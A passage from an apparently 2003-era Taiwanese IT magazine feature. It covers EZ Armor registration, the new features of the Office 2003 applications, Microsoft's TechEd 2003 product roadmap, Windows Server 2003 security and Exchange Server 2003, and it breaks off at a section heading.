註冊單由上至下要填寫的欄位分別是「EMai l、EMail、密碼、密碼、名字、姓氏、公司、國別」在填完國別 Taiwan後,系統會重載一次註冊網頁,並將國別後的註冊填位依序改為:「地址、郵政信箱(可不填)、城市、省分、郵遞區號、電話」,填完註冊表格後按Contin ue,確認資料無誤後再按一次Continue即完成註冊程序。此時系統會寄一封標題為EZ Armor Welcomes You的EMail到您註冊時所填的信箱,信件裡面會標註軟體的下載位址(ftp://ft pez.ca.com/pub/myeTrust/apps/EZArmor.exe )以及軟體的授權碼(在藍色的方塊裡Your L icense Key下面)
先抄下授權碼,然後點取郵件中的Download Now藍色方塊即可下載軟體。安裝時系統會請您填寫授權碼,請把剛才抄下來的授權碼填上去,然後就可選擇要安裝的模組。EZ Armor套餐最主要有三大功能,分別是用來保護個人隱私權的EZ Armor、用來防毒的EZ AntiVirus,以及擔任防火牆重任的EZ Firewall,視個人的需求勾選安裝完畢後,重新開機一次即可完成安裝。
Microsoft Office 2003
IRM資訊版權管理
以Windows Server 2003與Office 2003為主軸
資訊版權管理就是限制內容著作者建立的文件檔案,予以適當的保護。Office過去的保護文件功能僅侷限密碼的保護,隨著新的資訊版權管理(Information Rights Management,IRM)問世,可以提供商業等級的資訊交換保護。
IRM的資訊版權管理,依賴.NET Passport與Active Directory目錄服務的認證,個人端彼此取得讀取資料的認證,功能還有待提升,當發布大量版權文件後,.NET Passport的電子郵件認證機制問題還很多,未來個人如何管理各種發佈出去的文件,勢必衍生出許多管理問題。再說Office文件與應用程式無法跨平臺的狀況,非Office文件使用者還是完全無法使用IRM,更何況使用IRM服務的條件很窄,無論是受限Windows Server 2003或Office 2003,微軟能不能順利推動IRM,還是得看新產品普及率而定,變數很大。
建置版權管理
IRM是一種可以廣泛應用的工具,能夠延伸出許多解決方案,但並非隸屬資料復原的安全措施,而是文件中心的權限控管。與Office 2003結合的IRM等於是從過去檔案系統的存取權,延伸到應用程式等級實質的內控。IRM可以限定文件開啟、複製、列印、轉寄的使用者名單,防止未經授權的機密外洩,換言之,從檔案的密碼保護提升到能夠達到數位加密保護與細部權限控管能力。
IRM主要利用.NET Passport的認證體系,最基礎可以保護個人端產生的文件,而企業應用時,透過Active Directory的樹系信任整合,使得IRM能夠在同一個AD樹系、AD至一般普及的個人用戶的.NET Passport,或是AD與AD樹系之間的文件發布,利用微軟的目錄技術和.NET Passport認證機制結合後,有了明確的網路架構規範。
IRM需要透過Windows Server 2003的RMS加以認證,Office 2003專業版才具備完整的IRM功能,文件作者能夠發布版權文件,並授權給其他文件使用者。主要的Office應用程式,如Word、Excel、PowerPoint、Outlook、InfoPath都能夠發布版權管理原則,而Office 2003標準版就純粹只能讀取與編輯受保護文件的應用程式,無法主動發布文件。
RMS可以協助執行強制管理政策,如限制列印、轉寄及編輯資料,許可權可以設定過期的時間點,例如出版後一定的時間或是規律的間隔後,文件開啟者就需要重新提出新憑證申請,如此一來,公司機密或代理端權限等的政策範本就很容易創造和部署。文件控管可以應用在政府機構、私人顧問公司、健康醫療組織、股票經紀人,以及其他有需要使用有效方法保護數位資訊的企業。
應用版權管理
文件型的版權控制如Word 2003、Excel 2003和PowerPoint 2003的IRM,能夠根據使用者的不同角色,分別設定檢視對象、編輯權限,檔案到期時間與限制列印,以管理過期機密與文件列印複本數量。
Outlook 2003的IRM,訊息與附件都會受到保護,訊息在現有的MIME格式上,使用編碼限制電子郵件訊息發布,訊息再也不能無限散布。IRM伺服器控管下,RMS伺服器、用戶端電腦與使用者帳戶三方之間,都使用了1024位元的RSA密鑰防護。IRM在網路服務,尤其應用在線上出版時,最好在網際網路的所有連線上,再啟用128位元的SSL加密,多加一層保護。
假如只想單純讀取受保護的檔案,微軟提供免費的IRM檢視器,或是附加在IE的權限控管程式。
Word 2003
Word是Office內最常被使用的應用程式之一。由於Office 2003普遍都支援了XML,以Office XP提供的「工作窗格」介面為基礎,新增加參考資料功能(Research and Reference;R&R),整合Office原有的同義字、和翻譯的參考書籍,及新的參考資料庫網站搜尋,供使用者在撰寫文件時,隨時可以呼叫參考資料的工作窗格參考。Office共用的工作窗格,整合新的網站群組作業「共用文件區」與改良文件控管的「保護文件」。
共用文件區是利用Windows Server 2003的Windows SharePoint Services(WSS)建立的網站,以文件為中心建立共用工作區後,工作成員們可以直接在文件工作區的複本工作,一起處理共用文件,或在各自的複本上工作,然後定期更新文件工作區內的複本。
文件製作後,在文件交換過程中,我們希望確保文件都能夠受到一定程度的限制與保護。過去只能以密碼保護整個文件檔案,格式控管或是文件檔案讀寫權控管,一直都無法控制。Office 2003的保護文件功能,提供格式設定限制和編輯限制選項,格式設定限制,對習於使用樣式管理的文件作者比較有幫助。文件管理假如要應用版權控管,並想要整合各企業內部網路AD網域的信任時,就需要應用資訊版權管理(IRM),保護文件工作窗格最下方的「限制權限」可以指引使用者設定。
新的「閱讀版面配置」檢視,搭配保護文件,達到類似用Acrobat Reader檢視PDF檔案的效果。Office文件一向以編輯功能為主,較少考量到純粹閱讀文件內容的需求,為了便利編輯需要的檢視,使用者過去須透過預覽列印,或自行調整顯示比例,先切換至整頁模式、調整比例後,才能檢視整體文件效果。
Office 2003專業版支援XML的讀取與編輯,Word 2003能夠建立與編輯XML文件,使用者必須先有XML觀念,知道XML結構描述(XML Schema Definition;XSD)、XML擴充套件(XML Expansion Pack)的資訊清單與連結樣式表(Cascading Style Sheets,CSS)等XML組成的相關定義,才有能力設計XML檔案。
Word 2003改變不多,原來包含在Word內的工作窗格,普遍應用在Office整體應用程式,並且引用Web Services的參考資料連結與版權管理,仍然值得注意。
Excel 2003
Excel是比Access更實用的工具,由於支援CSV檔案格式,許多企業篩選資料庫的內容匯入Excel,利用統計函數計算獎金,並進一步製作報表。聰明的使用者會發現以Excel製作表格比Word更適合,任何資料來源甚至網頁的表格內容,皆可直接複製到Excel。
Excel 2003結合XML及Windows SharePoint Services,不但是強大的分析及試算工具,更可有效共用資訊,增加工作效率。Excel 2003可讀取XML資料,不需重新設定格式,並可進一步使用圖表、資料表及圖形分析功能。
相較於Excel 2002,Excel 2003不僅是XML試算表結構描述工具,且已是XML編輯工具,能夠分析與顯示最新的商業資訊。Excel 2003提供方便的視覺化對應工具,進階使用者不需撰寫任何程式碼,即可從資料庫、目錄服務或XML檔案等來源取得資料,使用「重新整理」即可更新內容,取得最新的資料。
新的清單功能可排列並分析資料,使用者可在試算表追蹤資料的範圍,輸入新項目時,資料輸入列即自動展開清單區域。使用「清單及XML」工具列的「切換合計列」功能,可在清單的任何欄位中,設定平均值、項目個數、數字項目個數、最大值、最小值、加總、標準差及變異數等指定值。此外,清單中的資料較易於執行列印、圖表或建立樞紐分析表等操作。
Office 2002即推出的智慧標籤,是以XML撰寫的彈出式小標籤,在文件編輯時會偵測使用者的操作,即時提供相關的操作建議。例如,複製並貼上一段文字、表格或圖片時,就會出現一個小小的圖示,按下後可選擇要以純文字、符合目的格式的設定或保持來源格式的設定的方式貼入。開發人員也可使用開發套件設計智慧標籤,使Office具備智慧溝通的能力。
Excel 2003的智慧標籤更具彈性,可將智慧標籤關連到試算表的特定部分,只有當滑鼠停留在關連的儲存格範圍內時才出現。
伺服器使用Windows Server 2003,透過Windows SharePoint Services將Excel 2003的試算表儲存於共用工作環境,將可有效共享資訊。搭配Windows Server 2003的RMS(Rights Management Services),可藉由IRM(Information rights Management;資訊權利管理)的功能,防止未授權的使用者轉寄、複製或列印重要的試算表,確實保護公司資產。
PowerPoint 2003
PowerPoint 2003新增的功能不多,使用Windows XP以上的作業系統,可直接封裝簡報檔成光碟為較特別的功能。不過,若搭配Windows Server 2003的Windows SharePoint Services及RMS(Rights Management Services),可協助使用者建立、發表及共同製作簡報,促進工作團隊的協同合作。
執行Windows SharePoint Services,PowerPoint簡報檔可儲存至共用工作環境,其他團隊成員即可取出或存回最新版的簡報檔。附加簡報檔在Outlook 2003的電子郵件中,使用「共用附件」選項可建立文件工作環境,工作團隊即可使用PowerPoint 2003的工作窗格,共同製作及檢閱簡報內容。啟動RMS使用IRM(Information Rights Management;資訊權利管理)功能,可防止使用者轉寄、複製及列印重要簡報,也可為簡報設定到期日,過期後電子郵件即無法檢視或修改。
Office 2003為更有效率地散布簡報檔,PowerPoint 2003搭配Windows XP內建的燒錄功能,新增「封裝成光碟」的選項。使用者可直接在PowerPoint 2003選擇需要的檔案,燒錄成光碟,並設定包含PowerPoint Viewer程式,即使電腦沒有安裝PowerPoint也可播放簡報。也可設定只要將光碟放到光碟機,簡報即以投影片放映模式自動啟動。若簡報檔包含機密資料,可設定開啟及防寫的密碼,確保內容不被惡意竄改。
為協助使用者提供令人印象深刻的簡報展示,PowerPoint 2003可以圖形、動畫及多媒體建立投影片。PowerPoint 2003改良投影片放映模式,筆跡註釋工具包括螢光筆、鋼珠筆及簽字筆,方便使用者更生動地講解內容並即時標記重點。Microsoft Office線上網站提供影像、聲音照片及動畫等上千種多媒體元素,使用者可下載使用,增加簡報的豐富性。使用者也可自訂動畫,建立同時移動的物件或路徑動畫,增添趣味。
新的「研究」工作窗格,協助使用者集中心力在工作上,無需離開PowerPoint即能迅速搜尋資料。「研究」工作窗格可將電子字典、同義字、線上研究網站引進PowerPoint中。
許多企業發散簡報檔時,多不希望內容被不當修改,所以常會將檔案轉換成唯讀的PDF檔,較為可惜的是,PowerPoint 2003仍未包含直接轉換檔案格式為PDF的功能。
Outlook 2003
調整版面配置並增加反垃圾郵件機制,以強化企業工作效率
多達一百多項變革的Outlook 2003,最明顯的是版面配置的調整,根據微軟分析,以垂直方向與多行檢視的版面配置方式,增加40%的顯示內容,允許顯示超過三段的文字與14封郵件訊息,減少使用者捲動視窗的時間,相較於舊版可檢視將近兩倍的資料。
郵件的排列方式提供6種標示旗幟,有更多分類管理的選擇。對於郵件量大的使用者,自訂搜尋條件的資料夾可協助過濾郵件內容。為提升轉換功能表的效率,可使用快速鍵「Ctrl+1、2、3、4、5」,切換郵件、行事曆、聯絡人、工作及附註等模組。
郵件的清單預設依日期以今天、昨天、上周及上個月等排序,如果使用者以檔案大小排序,Outlook 2003則以大、小及很大等自動將郵件分類,讓使用者可容易的找到需要的郵件。除可拖曳郵件至「我的最愛資料夾」以快速存取,也可在「搜尋資料夾」建立階層式資料夾,針對特定字串找出所有相關的郵件。搜尋資料夾是虛擬的資料夾,所有郵件仍保留於原始資料夾,不會佔用硬碟空間僅顯示搜尋的結果。藉由搜尋資料夾的分類,可瀏覽特定主旨、個人、工作或字串的內容,增加資料彙整的效率。
快取模式提供穩定的使用經驗
過去使用Exchange搭配Outlook,由於RPC通訊協定對網路連線的品質過於敏感,遇到連線狀態不穩的情況,Outlook為了企圖與Exchange伺服器連線,不時跳出Exchange Server要求連線的視窗,導致中斷工作的窘況,必須登出再設定為離線模式才能順利工作。
Exchange Server 2003搭配Outlook 2003提供許多新的功能,當網路頻寬不足或連線速度起伏不定時,快取功能可保持穩定的使用經驗。尤其使用無線網路時,牆柱及死角影響傳輸的品質,Outlook 2003切換至「Local Cache Mode」,將資料暫存於本機,當網路連線正常時,自動比對與Exchange伺服器的差異,進行同步作業,可大幅減少用戶端與伺服器同步作業傳輸的資料量。使用者也可彈性設定快取的內容,例如僅快取收件匣、通訊錄或行事曆等。為提高傳輸效率並降低成本,壓縮功能可減少傳輸的資料量,也可設定智慧型同步功能,只下載郵件標題,點選郵件時才下載內容。
搭配Windows Server 2003的RPC over HTTP Services,可提供即時且安全的傳輸功能,RPC over HTTP是安全的行動存取模式,從外部連線回企業時,可免除設定VPN麻煩的過程,固定以80埠進行遠端存取。
反垃圾郵件強化企業工作效率
垃圾郵件嚴重影響企業生產力,為防堵垃圾郵件的入侵,Outlook 2003依據一位國外教授的論文,設計郵件篩選機制,根據郵件傳送時間及訊息內容等因素,累積點數評估垃圾郵件的可能性。篩選功能預設為低階設定,目的在於捕捉最明顯的垃圾郵件,使用者可設定沒有保護、僅限信任清單及永遠刪除郵件取代移至Junk E-mail資料夾等不同保護層級。
Outlook 2003不可避免的也可能誤判訊息的合法性,使用者可針對寄件者新增至信任寄件者清單,或將沒有被Outlook 2003篩選出來的垃圾郵件,新增至垃圾寄件者清單。
HTML格式的郵件可能是在開啟時,才從網站伺服器下載圖片或音效,垃圾郵件即是在郵件中加入網路指標(Web Beacon)物件,在開啟時通知網站伺服器,可能導致使用者的收更多的垃圾郵件,Outlook 2003預設封鎖來自網際網路的內容下載,以防止不安全的訊息。
為徹底杜絕垃級郵件,Exchange Server 2003搭配Outlook 2003共包括三道防線,除了Outlook 2003的篩選機制,Exchange的Front-End伺服器可結合各種免費及付費的垃圾郵件黑名單,比對郵件的合法性。此外也可在Exchange Server自行設定信賴及垃圾郵件寄件者清單。估計Exchange Server 2003結合Outlook 2003的過濾機制,可防堵80%-90%的垃圾郵件。
InfoPath 2003
企業為了收集和管理資訊,設計請假單、加班單、請款單及出差單等,無數的表單供員工填寫。雖然市面上WorkFlow產品琳瑯滿目,卻未必可平順地將表單內容與相關系統整合,許多必須透過額外的轉檔,或資料庫轉換等客製化程序,無法即時擷取或重複使用資訊。更多企業是於各種系統之間重複輸入資料,不但增加資料輸入錯誤的機率,更導致工作效率的低落。
為協助企業再造商務流程,微軟推出InfoPath 2003 XML表單編輯器,以類似Word的一致性操作介面,及所見即所得的設計模式,再搭配多種範例表單,降低使用者的學習曲線。由於InfoPath 2003支援W3C的XML(Extensible Markup Language;可延伸標記語言)公開標準,可直接存取資料庫及Web Services,降低了資訊整合與應用的困難度。離線處理能力為InfoPath 2003的一大特色,使用者不再受限於特定地點,可先於本機輸入資料,待連回公司網路再進行同步作業。
透過InfoPath 2003收集資訊,可選擇資料來源存取資料庫,或存取XML及Web Services資料,並支援VB Script和Java Script,不過多數資料驗證機制,透過設定即可完成,已大幅降低程式開發的負擔。不同於一般表單格式固定無法調整的缺點,InfoPath 2003提供動態插入資料的彈性,使用者可根據資料的筆數,彈性調整表格的長短。InfoPath 2003結合Word和Excel的表單編輯經驗及文字處理程式,可設定字型、大小、拼字檢查、自動校正及欄位計算能力,使用者在不需了解XML的情況下,處理結構式文件。
為了讓企業輕易上手,InfoPath 2003提供許多範例表單,只要在設計模式下調整表單格式即可符合個別需求。開發人員也可自行設計表單,或透過ADO.NET連結資料庫,以滑鼠拖拉欄位即可完成。InfoPath 2003提供的多重檢視功能,可設定摘要、完整等各種檢視版本,依需求顯示、隱藏或重新排列資料的順序。
為方便出差的員工即時填寫表單,InfoPath 2003支援離線使用表單功能,可以DataSet、XML或Web Services形式於本機儲存表單,重新連回公司網路後,便可立即送填寫完成的表單。InfoPath 2003結合BizTalk Server,可與企業既有的ERP、CRM等系統整合,減少重複輸入的麻煩,也可輕易彙整資訊,提供決策者完整的訊息,做出正確的決定。
Access 2003
Access 2003與前一版本一樣,只有在Office專業版才提供。Access 2000以前的版本侷限在檔案型資料庫的應用,資料容量有限,延展性不佳,無法應用在多使用者的網路環境,Access 2000之後,可以與SQL Server及MSDE(Microsoft Data Engine)整合,突破資料容量及延展性,並且能夠建立主從式架構的應用程式。Access 2002可以處理XML的匯入與匯出,Access 2003持續增強XML轉換時的彈性,整合Microsoft Windows SharePoint Services(WSS)清單,Access增加新的作業方式。
Office 2003整合WSS後,Access 2003可以引用共用文件區功能,匯入、匯出或連結到WSS清單,使用者在開啟檔案與匯入資料功能時,選擇Windows SharePoint Services的檔案類型,Access會引導使用者連結網路上的共同作業的WSS網站。透過WSS的連結,使用者在Access裡面就可以直接操作遠端網站共享的的Access資料庫檔案。
Access原有的MDB檔案(Microsoft Access Database)使用Microsoft Jet資料庫引擎,Access利用當時新發展的專案檔(Access Database Project;ADP),用OLE DB Provider存取微軟MSDE及SQL Server等大型資料庫的資料,實體資料不需要存放在個別的資料檔案上。Access 2003的開發需要Microsoft Office Access 2003 Developer Extensions的延伸套件來協助。與提供給Word 2003 和 Excel 2003 開發的Visual Studio Tools for the Microsoft Office System似乎有所區隔。
Access 2003設定巨集安全性層級,以保護資料庫被不安全、可疑的VBA(Visual Basic for Applications)程式入侵,當開啟內含 VBA 程式碼的資料庫時都會出現提示。Access也會自動阻擋使用有安全疑慮的函數運算式,這是採用 Microsoft Jet Expression Service的沙箱模式(sandbox mode)協助防護發生在企業防火牆內部的後門攻擊,阻擋Access使用有安全疑慮的函數運算式。
Access如果無法與SQL Server的應用緊密結合,也無法憑直覺就可以學習應用,顯得直接學習SQL Server職能的投資報酬率,遠比投入Access來得高。微軟必須替Access規劃更具體的解決方案功能組合,教育大家用資料庫管理資料,而非散亂難以管理的文件檔案格式;定義更具體的Office本身的資料庫儲存需求,否則無法凸顯Access的生產力。
Publisher 2003
Publisher 2003在Office 2003專業版才有提供,是Publisher問世後第八個版本,能夠協助小型商業使用者建立印刷、網頁與電子郵件的商業溝通與行銷文件。由於定位在內容的桌面排版,因為包含在專業版內,隱然已經有凌駕Frontpage的氣勢。微軟提供大量的預設版型資料庫,使用者可以直接套用範本,再根據作者的設計感,細部修訂色彩、字型等配置。
工作窗格整合設計指南的介面。新增出版物功能提供印刷出版物、網站和郵件、設計集與空白出版物等指引。網站精靈可以建立各種類型的專業網站,包括3頁式網站、產品銷售或專業服務,假如使用者想更自由的建立網站內容,「簡易網站建立幫手」會協助自訂。Word 2003提供的電子郵件訊息格式,是作為Outlook 2003信件編輯器使用,Publisher 2003可以提供範本撰寫專業的電子郵件出版物,例如給媒體的新聞稿、事件發布或是產品促銷範本,而且Publisher可以匯入到Word檔案或是直接傳送給Outlook發信。
印刷出版物提供光碟標籤的外觀設計範本,而設計增強型的賀卡與邀請卡,或是建立個人通訊用的信箋集的標籤、信紙、信封、名片等,都提供比Word更多樣化的文件出版類型支援。
Publisher加強圖形管理員功能,增強管理出版物中所有圖形檔的能力,可以快速檢視並且排序出版物使用的圖形清單。圖形管理員還可以修正圖片連結的問題,並能夠檢視所有圖形的檔案路徑與圖片類型等資訊。新的尋找及取代工作窗格,能夠跨文字方塊、本文,在整個出版物中搜尋文字,以簡化尋找及取代文字的工作。
我們會常使用Word或Excel的合併列印功能,而Publisher 2003的合併列印與型錄合併列印精靈,可以協助製作例如產品型錄、目錄、通訊錄、相簿、存貨單。利用儲存在工作表、表格或資料庫等資料來源的資訊,將資料來源的多筆記錄合併到單一出版物中列示多個項目,建立多種類型的出版物。圖片還可以合併到出版物中,建立具有圖解的產品型錄或相簿。
強化商業印刷的部分,能夠輸出列印複合式四色印刷(CMYK) 的PostScript,並且將RGB轉換至CMYK最佳化。
Publisher 2003增加Office文件的桌面出版功能,提升至商業印刷的水準,並且與Word、Outlook能夠連結使用,增加可用性與便利度。
Project 2003與Visio 2003
商務流程標準化走向協同運作
Project 2003 是微軟的企業專案管理解決方案Enterprise Project Management;EPM),協助企業提升專案管理的決策透明度,最佳化資源分配,並且能夠建立可重複的專案流程。網站作業的專案協同運作,能達到更好的專案管理效率。
專案只是企業營運目標的抽象代稱,實質上的計畫與執行,才是落實專案的關鍵,Visio 2003可以協助企業管理商務程序,與整合應用專案文件協同作業。Visio 2003用繪圖和製作圖表來解決流程表達的問題,與Word和PowerPoint相比,Visio的自動建立圖表,在每一個圖形物件內儲存資訊,圖表上的資料能匯整成報表。Visio使用智慧型格式化的工具和Microsoft SmartShapes符號範本,比起文書處理或影像處理軟體,能更輕易地將商業和技術概念,轉換為視覺化的圖表。
Project 2003
企業專案管理解決方案整合用戶端、伺服器、網站的技術,提供使用者管理企業專案的所有需求。包含︰
一、Microsoft Project專業版︰是Project的用戶端應用程式,必須安裝在Windows環境,而Microsoft Project Professional想利用EPM的協同作業,必須利用網路連接到Microsoft Project Server。
二、Microsoft Project Server︰Windows SharePoint Services(WSS)的網站服務,提供專業版用戶端程式與網頁瀏覽器連接的介面,Project Server必須記得安裝這項服務。Microsoft Project專業版和IE瀏覽器的使用者,通常需要連到Project Server,以便使用儲存庫發布的資源與專案資訊。
三、Microsoft Project Web Access︰使專案經理和團隊成員不需要Project專業版,用IE瀏覽器就可以直接在Project Server檢視與更新專案。
Project 2003利用資源代理精靈,專案可以透過Project 2003這樣技術導向的資源分配工具,跨組織地追蹤與管理人員,有效分配。改良後的專案時程表,可以與Outlook整合,因為管理專案時程與預算狀態,需要最新與正確的資料,藉由Microsoft Project Server Web Access網站的時刻表,和Outlook行事曆的整合,能夠減少專案管理的資料手動更新工作。
Visio 2003
Microsoft Office Visio 2003是一種圖表繪製應用程式,可協助公司和知識工作者記錄、設計、溝通及自動化複雜的構想、程式和系統,藉此讓他們可以採取更實際而有效的行動。
Visio提供標準版與專案版兩種版本。標準版提供了各種圖表繪製解決方案,幫助建立好的專案資訊,進行流程視覺化的文件工作。專業版能夠協助資訊、開發及工程等技術專業人員,視覺化構思與系統等資訊,製作出新模型。專業版包含標準版的商業圖表繪製解決方案。
Visio提供新的腦力激盪圖,整合Office應用程式,可以匯出成Word文件的大綱形式。或使用Outlook資料,轉換成更視覺化的行事曆。Microsoft Project產生的專案檔與里程碑檔案,可以經由Visio雙向存取,匯出/匯入時刻表與甘特圖。
Visio 2003提供與其他微軟伺服器產品的整合與連結。Visio 2003可以從Exchange Server取得全域通訊清單,產生組織圖,也能從SQL Server和Access中反向取得資料庫結構;用Visio的實體關聯圖可以用來設定資料庫,連結到資料庫修改也沒問題。
建立程式開發的UML圖,支援Visual Basic .NET和C#的增益集;設計和記載商務程序時,Visio可以動態與BizTalk Server進行自動化程序與共用,管理時Active Directory,Visio也用來規畫部署和遷移。
從TechEd看微軟技術趨勢
微軟自從推出Windows Server 2003之後,明確地將旗下的伺服器產品、Office應用程式與.NET開發環境整合成Windows Server System、Office System與.NET Framework的Web Services的服務平臺。
在微軟數位十年的規畫,Windows Server 2003後,在2005年預備推出代號Longhorn的作業系統,而Windows Server System旗下涵蓋的18個產品,預計在2006年前,將會逐一依照營運管理、應用程式及資訊工作者等三種企業用途,各自整合。
System Management Server(SMS)、Microsoft Operation Management(MOM)負責營運管理。SMS 2003和MOM 2004將分別在2003年底與2004年推出新版本,之後會合併成System Center Suite,以System Center之名,責Windows Server System的管理與部署。
開發環境、資料庫與企業應用程式整合的產品,將會產生應用程式平臺整合態勢。Visual Studio .NET 2003預計會在2004年發表下一個版本Whidbey,接著會是Orcas;而BizTalk Server 2004與SQL Server 「Yukon」都會相繼問世,最後整合成代號為Jupiter的E-Business Suite。
以資訊工作者為服務對象的產品整合,2003年到2004年間會陸續發表的,包括Exchange Server 2003、Office 2003、Project Server 2003、Live Communications Server 2003及SharePoint Portal Server 2003,2005年預計發表針對Longhorn 平臺的Office、Live Communications Server v2與SharePoint Portal Server v3,等到2006年Exchange Server預計會推出代號Kodiak的改版。
使用Windows Server 2003的必要性
從微軟的服務平臺架構來看,所有新的技術大部分必須使用Windows Server 2003,才能夠得到新技術的完整支援。Windows 2000目前已經是許多業界的標準建置環境,然而目前企業非得升級成Windows Server 2003的最大原因,卻是來自微軟對於新的Active Directory建置模式的強硬政策:微軟不再允許新的AD採取混合模式,或使用相容於NT 4、Windows 2000的幾種現有目錄服務應用模式。
微軟用新的應用程式技術架構與目錄服務,迫使企業面對新的Windows Server System需求。除非只使用.NET Framework開發應用程式,否則想要使用往後的微軟產品,非選擇Windows Server 2003作為基底不可,尤其當企業選擇的微軟解決方案,包含Windows SharePoint Services的應用,與牽涉AD樹系信任的管理與部署,就會受到影響。
Windows Server 2003的AD改善與修正部分Windows 2000 AD的問題。例如通用類別目錄(Global Catalog,GC)的改良,減少了使用者登入依賴GC的必要,通用類別目錄的屬性副本透過快取,可以只同步管理者新增的屬性,不需要經常完整同步。安裝網域控制站(Domain Controller,DC)時有新的做法,過去只能透過企業內部網路,將整個目錄資料庫複寫到新的 DC資料庫,過去的做法都是在同一個地點作好複寫,再「運」伺服器到當地去;Windows Server 2003的AD提供了AD資料庫與物件匯出到備分媒體,如CD、DVD、磁帶或硬碟的共用資料夾,然後在異地安裝完Windows Server 2003後初始化網域控制站時,可以再匯入AD的資料。
勇於面對安全性議題
從Nimda和CodeRed病毒之後,以及最近的Blaster,微軟的作業系統一直深受安全漏洞與修正程式部署不一致性所困擾,責任在微軟也在所有的使用者習慣,所有使用者不斷抱怨安全漏洞問題,以及層出不窮的病毒蠕蟲事件,在在促使微軟得積極地面對這項指責。於是Windows Update網站不尋常地加上更多更明顯的提醒,可見安全性議題在微軟的系統平臺上已經得到重視。微軟和使用者都很清楚,「覆巢之下無完卵」,一旦作業環境的安全性無法確保,再怎麼強調簡單易用,無法保障系統安全,是不能挽回企業與使用者的信心。
Windows Server 2003從過去的經驗和Unix等其他作業系統中學到,唯有減少攻擊面向,降低預設的服務內容,才能夠使大部分只採用安裝預設值的Windows作業系統得到保障。
為了因應無線網路環境的興起,Windows Server 2003持續強化新的協定,如802.1×、EAP-TLS、IAS等身分驗證機制,補足WEP不完備之處;Windows Server 2003的Certificate Services和AD,讓企業能利用群組原則,集中控管用戶端作業系統。Windows 作業系統也支援IPSec的標準,以防護TCP/IP的網路不安全。
ISA Server是微軟的企業級防火牆產品,ISA Server今年發布了Feature Pack1,提供改進的 SMTP 篩選器,可以協助網路避免垃圾郵件,並且為那些沒有VPN,又要存取 Microsoft Exchange Server郵件的遠端 Microsoft Outlook使用者提供保護。Feature Pack 1可以也透過URLScan 2.5 for ISA Server和RSA SecurID 驗證,改善Web 伺服器和執行 Microsoft Outlook Web Access(OWA)伺服器的安全性,以對抗各種不斷演進的網際網路攻擊類型,及使用驗證協助控制伺服器的存取。
不只Web化,全面Web Services化
微軟陸續將.NET整合到所有的產品內。Word與Excel應用程式的開發從過去的VBA,整合Visual Studio .NET 2003的類別庫,可以用C#和VB .NET撰寫ADO.NET與XML Web Service,結合Word與Excel的物件模型,開發出結合文件與圖表的Office應用程式,突破以往功能與效率存取Web Services的瓶頸。
SQL Server 2000的SQL stored procedures與取得資料庫的Schema等功能,已經可以與.NET軟體開發整合,TechEd 2003在開設的Yukon功能預覽的課程中,提到與.NET整合的發展趨勢。
BizTalk 2004與.NET之間的整合最新發展是,Biztalk 2004的專案可以透過Visual Studio .NET開發,而且包含BPEL(Business Process Execution Language)的Web Services原生支援,提供企業在不同的後端系統間溝通的標準。
Content Management Server 2002讓開發人員藉由使用 ASP.NET 和 Microsoft .NET Framework,能夠建立以Content Management Server 為基礎的應用程式,並且可以使用Visual Studio .NET開發Content Management Server 2002 的網站範本。Commerce Server 2002同樣如此,支援 COM/ASP 與 ASP.NET 類別開發。
ASP.NET已經成為Web應用程式的主要技術,與Windows Sharepoint Services、IIS 6.0同樣都是微軟產品啟用入口網站功能的重要元件。於是不僅在資料庫、應用程式整合、電子商務或內容管理,連Microsoft Operations Manager的事件整合管理工具,都支援.NET與Web Services的開發能力。
由Windows Server 2003與.NET Framework所環繞的所有產品與技術,正代表了微軟不只是看好,而是持續將產品Web Services化,以及加碼.NET的決心。意味著微軟對於跨平臺需求與開放標準的回應,就是共同打造Web Services的世界,不只是同陣營的協力廠商,或身為用戶端必須接受這個事實,甚至所有Windows平臺的軟體開發商都必須體認應用程式轉變成Web Services化的趨勢,微軟18項產品的技術領軍,足以作為企業應用的確可行的示範與證明。
TechEd 2003特別報導-Exchange Server 2003中文版上市
整合伺服器與用戶端功能的訊息平臺
Exchange Server 2003於9月30日TechEd 2003正式發表,不同於以往英文的內容搭配中文的操作介面,Exchange Server 2003是全中文化的版本,反而是對於熟悉Exchange Server的使用者,可能會有些不習慣中文的訊息內容,微軟的講師在多堂Exchange升級及應用的課程中,特別註明了中英文對照的內容,以加快Exchange的愛用者適應的腳步,而對於初學者而言,當然是中文化的內容較具親和力。
防堵垃圾郵件及快取模式提升工作效率
Exchange Server 2003針對反垃圾郵件提供三層保護,首先可在伺服器建立垃圾郵件黑名單,設定允許及拒絕的清單,也可結合資訊廠商的外掛程式。其次,在Exchange伺服器可設定信件內容判斷條件,過濾可能的垃圾郵件。此外,使用者也可在用戶端自行設定過濾條件,雖然對於棘手的垃圾郵件沒有絕對百分之百的防護措施,但透過層層關卡的檢驗,可有效杜絕80%至90%的垃圾郵件。
當網路連線頻寬不高,或使用無線網路導致連線狀態不穩時,Exchange Server 2003搭配Outlook 2003提供快取模式,系統會在本機複製一分郵件內容,不因網路斷線而無法工作,並提供智慧型同步功能,偵測網路慢速時僅下載標題,待使用者點選郵件,才下載郵件內容,可節省等待網路傳送的時間。
OWA與OMA
OWA(Outlook Web Access)是透過瀏覽器存取Exchange的機制,會根據用戶端的語系設定顯示各國語系,對於機動性較高的人員,是相當方便的功能。使用IMAP4通訊協定,將郵件儲存於伺服器,對於經常四處奔波,不固定在辦公室的人員而言,有很大的便利性,可不受電腦的箝制隨時連上伺服器查詢郵件,登出後也不用擔心他人看到私人郵件內容。Exchange Server 2003的OWA介面與Outlook 2003極為相似,使用者不需重新學習,可更廣泛的隨處存取郵件訊息,用戶端不需設定繁瑣的郵件伺服器及使用者帳號密碼等內容,企業可節省維護的成本。為提升郵件存取的安全性,Exchange 2003 OWA提供逾時登出機制,管理者也可至登錄檔(Registry)修改逾時時間。OWA支援SSL及S/MIME等加密功能,封鎖HTML附件更可防堵駭客入侵。
過去Exchange雖然提供Mobile Information Server支援行動裝置,但由於交換機相容性及中文化問題,在臺灣並不適用。況且行動裝置必須先透過電腦與伺服器同步,才能與行動裝置同步,並不方便。Exchange Server 2003的行動裝置模組OMA(Outlook Mobile Access)只要PDA或智慧型手機支援WiFi、GPRS或i-Mode,或手機支援WAP 2.0均可直接存取郵件,並與商業流程整合,滿足審核及確認的需求。
為了要在還原信箱及信箱儲存區時能提供更多彈性,Exchange 2003 提供了「復原儲存群組」功能,結合Exchange Mailbox Merge Wizard,可提供快速復原的能力。
嚴謹的升級程序
